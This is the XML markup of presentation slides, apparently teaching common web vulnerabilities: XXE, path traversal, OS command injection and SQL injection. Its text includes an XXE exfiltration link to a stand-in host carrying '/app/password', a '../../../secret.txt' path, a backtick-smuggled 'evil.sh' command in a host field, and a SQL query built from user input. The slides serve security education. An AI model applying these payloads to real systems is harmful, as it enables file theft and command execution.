          <a:xfrm>
            <a:off x="2217600" y="2794320"/>
            <a:ext cx="230400" cy="290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TextBox 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2643480" y="2501640"/>
            <a:ext cx="4252320" cy="615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9900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:alpha val="23000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt; /&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="19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Rectangle 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805480" y="3013920"/>
            <a:ext cx="3992760" cy="2322720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ff0000">
              <a:alpha val="3000"/>
            </a:srgbClr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1542600" y="443160"/>
            <a:ext cx="10513440" cy="54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7222" lnSpcReduction="10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XML External Entities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44" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1645560" y="4703760"/>
            <a:ext cx="1048320" cy="1591560"/>
            <a:chOff x="1645560" y="4703760"/>
            <a:chExt cx="1048320" cy="1591560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="345" name="Graphic 16" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1694880" y="4703760"/>
              <a:ext cx="950400" cy="95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46" name="TextBox 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1645560" y="5657040"/>
              <a:ext cx="104832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47" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354320" y="2352600"/>
            <a:ext cx="16243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XML Processor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8" name="Picture 21" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811880" y="1484280"/>
            <a:ext cx="716400" cy="870840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="TextBox 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2932560" y="3267720"/>
            <a:ext cx="3738960" cy="22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Include </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0432ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>/app/password 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file as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>&amp;xxe;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Link to: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0432ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>http://www.evil.bad/DTD?pass=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>&amp;xxe;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50" name="Curved Connector 32"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="348" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2528280" y="1917720"/>
            <a:ext cx="2458080" cy="2160"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 30511"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="76000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="TextBox 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2486520" y="1460520"/>
            <a:ext cx="3295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/DTD?pass=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-CA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jmttN9YC4bK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2" name="Picture 38" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4984200" y="1454760"/>
            <a:ext cx="716400" cy="924120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="TextBox 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4589640" y="2412360"/>
            <a:ext cx="15058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www.evil.bad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54" name="Curved Connector 50"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="345" idx="0"/>
            <a:endCxn id="347" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="1311840" y="3845520"/>
            <a:ext cx="1713240" cy="3960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25010"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="TextBox 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3908520" y="5338800"/>
            <a:ext cx="1824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XML Document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Picture 81" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567800" y="2197800"/>
            <a:ext cx="347040" cy="447840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="357" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3382560" y="1671840"/>
            <a:ext cx="873000" cy="1060920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic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1228680" y="790200"/>
            <a:ext cx="10513440" cy="54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7222" lnSpcReduction="10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Path Traversal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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4173120" y="1807560"/>
            <a:ext cx="2763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file.txt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60" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2916360" y="4257000"/>
            <a:ext cx="1683720" cy="1498320"/>
            <a:chOff x="2916360" y="4257000"/>
            <a:chExt cx="1683720" cy="1498320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="361" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3026160" y="4257000"/>
              <a:ext cx="950400" cy="950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62" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3361320" y="4440240"/>
              <a:ext cx="950400" cy="95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63" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2916360" y="5391360"/>
              <a:ext cx="16837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Regular Users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64" name="Group 63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1228680" y="4514040"/>
            <a:ext cx="1048320" cy="1539720"/>
            <a:chOff x="1228680" y="4514040"/>
            <a:chExt cx="1048320" cy="1539720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="365" name="Graphic 16" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1277640" y="4514040"/>
              <a:ext cx="950400" cy="95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66" name="TextBox 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1228680" y="5415480"/>
              <a:ext cx="104832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367" name="Curved Connector 21"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="365" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1996560" y="2684160"/>
            <a:ext cx="1586520" cy="2074320"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16500"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081440" y="3427200"/>
            <a:ext cx="2763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../../../secret.txt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9" name="Graphic 11" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1525680" y="2315520"/>
            <a:ext cx="454320" cy="454320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="370" name="Graphic 13" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3369600" y="2015280"/>
            <a:ext cx="910800" cy="910800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="371" name="Graphic 49" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2658960" y="2167200"/>
            <a:ext cx="708120" cy="708120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="372" name="Graphic 50" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2050560" y="2269440"/>
            <a:ext cx="582480" cy="582480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="373" name="Curved Connector 60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="370" idx="2"/>
            <a:endCxn id="362" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="3073680" y="3677400"/>
            <a:ext cx="1514520" cy="11880"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25011"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="374" name="Curved Connector 65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="371" idx="0"/>
            <a:endCxn id="370" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="3039480" y="2140560"/>
            <a:ext cx="759240" cy="812520"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -19307"/>
              <a:gd name="adj2" fmla="val -65735"/>
              <a:gd name="adj3" fmla="val 119307"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="375" name="Curved Connector 75"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="372" idx="0"/>
            <a:endCxn id="371" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="2374560" y="2236680"/>
            <a:ext cx="606240" cy="671400"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -24777"/>
              <a:gd name="adj2" fmla="val -70225"/>
              <a:gd name="adj3" fmla="val 124777"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="376" name="Curved Connector 78"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="369" idx="0"/>
            <a:endCxn id="372" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="1779120" y="2289240"/>
            <a:ext cx="536760" cy="589320"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28322"/>
              <a:gd name="adj2" fmla="val -69132"/>
              <a:gd name="adj3" fmla="val 128322"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Rectangle 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="519120" y="2071800"/>
            <a:ext cx="1176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secret.txt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TextBox 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918240" y="4128840"/>
            <a:ext cx="2763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file.txt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1173600" y="21096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OS Command Injection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0" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123560" y="1898280"/>
            <a:ext cx="1369440" cy="1664280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="381" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1329120" y="4358880"/>
            <a:ext cx="1048320" cy="1548360"/>
            <a:chOff x="1329120" y="4358880"/>
            <a:chExt cx="1048320" cy="1548360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="382" name="Graphic 5" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1339200" y="4358880"/>
              <a:ext cx="950400" cy="95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83" name="TextBox 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1329120" y="5268960"/>
              <a:ext cx="104832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384" name="Curved Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="382" idx="0"/>
            <a:endCxn id="380" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="1413000" y="3957480"/>
            <a:ext cx="796680" cy="6480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1756800" y="3926520"/>
            <a:ext cx="2009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host: ABC</a:t>
            </a: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`evil.sh`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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196640" y="1582560"/>
            <a:ext cx="1118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Program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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520800" y="1713600"/>
            <a:ext cx="2106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Operating System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88" name="Curved Connector 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="380" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493000" y="2730240"/>
            <a:ext cx="1394280" cy="5760"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 34684"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="TextBox 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2397600" y="2398320"/>
            <a:ext cx="156492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808080"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>ping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 ABC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>`evil.sh`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90" name="Group 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5735880" y="1483200"/>
            <a:ext cx="1563480" cy="966600"/>
            <a:chOff x="5735880" y="1483200"/>
            <a:chExt cx="1563480" cy="966600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="391" name="Graphic 30" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735880" y="1483200"/>
              <a:ext cx="1157760" cy="966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92" name="Rectangle 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735880" y="1483200"/>
              <a:ext cx="1563480" cy="227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900" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="DejaVu Sans"/>
                </a:rPr>
                <a:t>&gt;_ ping ABC</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="9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93" name="Group 52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5735880" y="2808720"/>
            <a:ext cx="1563480" cy="966600"/>
            <a:chOff x="5735880" y="2808720"/>
            <a:chExt cx="1563480" cy="966600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="394" name="Graphic 53" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735880" y="2808720"/>
              <a:ext cx="1157760" cy="966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95" name="Rectangle 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5735880" y="2808720"/>
              <a:ext cx="1563480" cy="242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000" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="DejaVu Sans"/>
                </a:rPr>
                <a:t>&gt;_ evil.sh</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US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396" name="Straight Arrow Connector 56"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="391" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5128560" y="1966320"/>
            <a:ext cx="607680" cy="769680"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="397" name="Straight Arrow Connector 57"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="394" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5128560" y="2733840"/>
            <a:ext cx="607680" cy="558360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="ff0000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Rectangle 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5787360" y="1739880"/>
            <a:ext cx="11667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A" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="f4f4f4"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>ping: cannot resolve ABC: Unknown host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Rectangle 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847120" y="3149640"/>
            <a:ext cx="1166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CA" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="f4f4f4"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>&gt; : 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0" name="Graphic 63" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3913200" y="2152800"/>
            <a:ext cx="1154880" cy="1154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TextBox 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2291760" y="2376720"/>
            <a:ext cx="3746520" cy="5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100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0432ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE user='</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>jsmith'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2445120" y="51012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SQL Injection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3" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
